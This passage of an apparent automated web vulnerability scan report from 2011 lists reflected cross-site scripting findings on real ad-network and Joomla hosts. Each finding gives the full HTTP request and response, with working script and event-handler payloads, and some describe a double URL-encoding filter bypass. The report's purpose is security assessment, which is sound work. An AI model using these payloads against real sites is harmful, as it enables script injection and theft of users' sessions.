Content-Type: application/x-javascript
X-Varnish: 2085894141
Cache-Control: max-age=2591944
Expires: Wed, 23 Feb 2011 21:58:24 GMT
Date: Mon, 24 Jan 2011 21:59:20 GMT
Connection: close
Content-Length: 5232

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
y_date = new Date();
idx_expiry_date.setTime(idx_expiry_date.getTime() + (30*24*60*60*1000));
var idx_cTime = idx_expiry_date.toGMTString();
var idx_cVal = 'PI=' + 'h749620Za886284' + 'Zc' + '305002290320ca';d13e48cf55b%2C305002290' + 'Zs' + zzIdxSection + 'Zt' + age
if(document.domain.match(zd_domain)){
document.cookie = idx_cVal + ';expires=' + idx_cTime + ';domain=' + zd_domain + ';path=/;';
} else {
document.wri
...[SNIP]...

4.54. http://c5.zedo.com//ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://c5.zedo.com
Path:	//ads2/k/886284/2333/172/0/305002290/305002290//0/305/788//2000004/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6117'%3b9e9d8ef0603 was submitted in the REST URL parameter 8. This input was echoed as a6117';9e9d8ef0603 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET //ads2/k/886284/2333/172/0/305002290/305002290a6117'%3b9e9d8ef0603//0/305/788//2000004/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1; ZFFAbh=749B826,20|1483_749#365; FFgeo=5386156; FFcat=305,2290,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 1041405764
Cache-Control: max-age=2592000
Expires: Wed, 23 Feb 2011 21:59:22 GMT
Date: Mon, 24 Jan 2011 21:59:22 GMT
Connection: close
Content-Length: 5232

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
Date();
idx_expiry_date.setTime(idx_expiry_date.getTime() + (30*24*60*60*1000));
var idx_cTime = idx_expiry_date.toGMTString();
var idx_cVal = 'PI=' + 'h749620Za886284' + 'Zc' + '305002290%2C305002290a6117';9e9d8ef0603' + 'Zs' + zzIdxSection + 'Zt' + age
if(document.domain.match(zd_domain)){
document.cookie = idx_cVal + ';expires=' + idx_cTime + ';domain=' + zd_domain + ';path=/;';
} else {
document.write('<scr' +
...[SNIP]...

4.55. http://cdn.joomla.org/megamenu/css/maximenuH_CK.php [monid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.joomla.org
Path:	/megamenu/css/maximenuH_CK.php

Issue detail

The value of the monid request parameter is copied into the HTML document as plain text between tags. The payload 30c50<img%20src%3da%20onerror%3dalert(1)>dcee7b8ef2c was submitted in the monid parameter. This input was echoed as 30c50<img src=a onerror=alert(1)>dcee7b8ef2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /megamenu/css/maximenuH_CK.php?monid=maximenuCK30c50<img%20src%3da%20onerror%3dalert(1)>dcee7b8ef2c HTTP/1.1
Host: cdn.joomla.org
Proxy-Connection: keep-alive
Referer: http://www.joomla.org/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 13:56:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=300, must-revalidate
Content-Type: text/css
X-Cache: MISS from cdce-nym011-010.nym011.internap.com
X-Cache: MISS from cdce-nym011-011.nym011.internap.com
Via: 1.1 cdce-nym011-010.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-011.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: close

.clr {clear:both;}

/**
** global styles
**/

/* container style */
div#maximenuCK30c50<img src=a onerror=alert(1)>dcee7b8ef2c ul.maximenuCK {
background : #ffffff;
height : 38px;
padding : 0;
margin : 0;
float: right;
}

div#maximenuCK30c50<img src=a onerror=alert(1)>
...[SNIP]...

4.56. http://cdn.joomla.org/megamenu/css/maximenuH_CK.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.joomla.org
Path:	/megamenu/css/maximenuH_CK.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c27c2<img%20src%3da%20onerror%3dalert(1)>c3d9b0cd94d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c27c2<img src=a onerror=alert(1)>c3d9b0cd94d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /megamenu/css/maximenuH_CK.php?monid=maxime/c27c2<img%20src%3da%20onerror%3dalert(1)>c3d9b0cd94dnuCK HTTP/1.1
Host: cdn.joomla.org
Proxy-Connection: keep-alive
Referer: http://www.joomla.org/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 13:56:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=300, must-revalidate
Content-Type: text/css
X-Cache: MISS from cdce-nym011-015.nym011.internap.com
X-Cache: MISS from cdce-nym011-014.nym011.internap.com
Via: 1.1 cdce-nym011-015.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-014.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: close

.clr {clear:both;}

/**
** global styles
**/

/* container style */
div#maxime/c27c2<img src=a onerror=alert(1)>c3d9b0cd94dnuCK ul.maximenuCK {
background : #ffffff;
height : 38px;
padding : 0;
margin : 0;
float: right;
}

div#maxime/c27c2<img src=a onerror=alert(1)>
...[SNIP]...

4.57. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [btid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.w55c.net
Path:	/i/0Rw6qcLcmo_34070076.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e13f9"><script>alert(1)</script>11d8993dae5 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fAe13f9"><script>alert(1)</script>11d8993dae5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 04:29:05 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Tue, 25 Jan 2011 03:57:22 GMT
Pragma: no-cache
Cneonction: close
Nncoection: close
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1379

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fAe13f9"><script>alert(1)</script>11d8993dae5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg" />
...[SNIP]...

4.58. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [ei parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.w55c.net
Path:	/i/0Rw6qcLcmo_34070076.html

Issue detail

The value of the ei request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2482"><script>alert(1)</script>b4bb50bcb1f was submitted in the ei parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORKe2482"><script>alert(1)</script>b4bb50bcb1f&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 04:29:13 GMT
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Date: Tue, 25 Jan 2011 03:50:58 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1379

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORKe2482"><script>alert(1)</script>b4bb50bcb1f&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg" />
...[SNIP]...

4.59. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [rtbhost parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.w55c.net
Path:	/i/0Rw6qcLcmo_34070076.html

Issue detail

The value of the rtbhost request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d85"><script>alert(1)</script>00a8892c12 was submitted in the rtbhost parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.neta6d85"><script>alert(1)</script>00a8892c12&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 04:28:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Tue, 25 Jan 2011 03:57:22 GMT
Cneonction: close
Nncoection: close
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1378

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.neta6d85"><script>alert(1)</script>00a8892c12/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&
...[SNIP]...

4.60. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html [wp_exchange parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.w55c.net
Path:	/i/0Rw6qcLcmo_34070076.html

Issue detail

The value of the wp_exchange request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a96"><script>alert(1)</script>a129b5a33ed was submitted in the wp_exchange parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg68a96"><script>alert(1)</script>a129b5a33ed&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 04:29:21 GMT
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Date: Tue, 25 Jan 2011 03:48:06 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1379

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg68a96"><script>alert(1)</script>a129b5a33ed" />
...[SNIP]...

4.61. http://click.linksynergy.com/fs-bin/click [offerid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload 51a66<script>alert(1)</script>c6e752edb23 was submitted in the offerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fs-bin/click?id=Xy0hOcdtU4s&offerid=51a66<script>alert(1)</script>c6e752edb23&type=2&subid=0 HTTP/1.1
Host: click.linksynergy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 258
Date: Mon, 24 Jan 2011 15:01:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body>
Bad number format in offerid: For input string: "51a66<script>alert(1)</script>c6e752edb23"
</body>
...[SNIP]...

4.62. http://delb.opt.fimserve.com/fimbid/ [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delb.opt.fimserve.com
Path:	/fimbid/

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 9ab3c<script>alert(1)</script>7a127ff3b25 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fimbid/?cachebuster=1295921111939Gck&cb=window[%22AIIcb%22]9ab3c<script>alert(1)</script>7a127ff3b25&sz=728x90&api=2&enc=1.1&est=b560d84a436c1f260f16c34efa66d8e3&l=52f2b867-a818-426d-a674-eefac27a73f6&ega=&neg=&pub=2094107610&pcat=29&ck=1&fl=1&d=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: delb.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJk0pDkd8SnPo7AmDAg==; UI=284ab5a022ca529df|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; LO=00JW6MJ6I1c0G05B0010OPU; ssrtb=0

Response

4.63. http://developer.joomla.org/a [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/a

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acd8e%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec304c81e309 was submitted in the REST URL parameter 1. This input was echoed as acd8e"><img src=a onerror=alert(1)>c304c81e309 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /aacd8e%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec304c81e309 HTTP/1.1
Host: developer.joomla.org
Proxy-Connection: keep-alive
Referer: http://developer.joomla.org/a9be7%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec8433896990
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utmz=194671032.1295885228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; 39f24a85b5d169a21046edfe6eaa5320=24d4dc7aa5497203c5eea18807f36bae

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:59:58 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
X-Content-Encoded-By: Joomla! 1.6
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 8142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<base href="http://developer.joomla.org/aacd8e"><img src=a onerror=alert(1)>c304c81e309" />
...[SNIP]...

4.64. http://developer.joomla.org/getting-started.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/getting-started.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2f1d%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e956a7445bcc was submitted in the REST URL parameter 1. This input was echoed as c2f1d"><img src=a onerror=alert(1)>956a7445bcc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /c2f1d%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e956a7445bcc HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 39f24a85b5d169a21046edfe6eaa5320=95e1cdffac3a54787d3c76b571d6fde2; __utmz=194671032.1295890937.1.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=194671032.1441739327.1295885228.1295885228.1295885228.1; __utmc=194671032; __utmb=194671032.18.10.1295890937;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Connection: close
